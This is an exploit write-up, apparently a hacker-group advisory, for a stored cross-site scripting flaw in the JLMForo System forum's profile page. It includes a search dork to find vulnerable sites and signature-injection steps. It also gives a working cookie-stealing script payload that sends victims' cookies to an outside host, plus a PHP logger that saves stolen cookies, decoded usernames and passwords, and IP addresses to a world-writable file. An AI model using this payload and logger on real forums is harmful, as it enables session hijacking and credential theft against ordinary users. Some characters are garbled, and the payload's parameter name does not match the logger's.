# JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability
# Download:
# http://www.miscodigos.com/aplicaciones/JLMForo%20System/
# Bug found by Jose Luis Gngora Fernndez / JosS
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "Powered By JLMForo System"
# Stop lammer
# Explanation Basic :
1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait to an answer to visualize the XSS
# To Rob Cookies:
1?- Register in the forum (registro.php)
2?- Put in your signature the XSS (modificarPerfil.php):
<script>window.location=?http://yousite.com/xss.php?cookie=?+document.co
okie</script>
3?- Upload in your Site:
<?php
$archivo = fopen('log2.htm','a');//Aqu podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;
$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>
IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>
4?- Chmod 777 archive
5?- Create a subject
6?- Wait to an answer to run the XSS
//---------------------------------------\
Greetz To: All Hackers
Jose Luis Gngora Fernndez / JosS!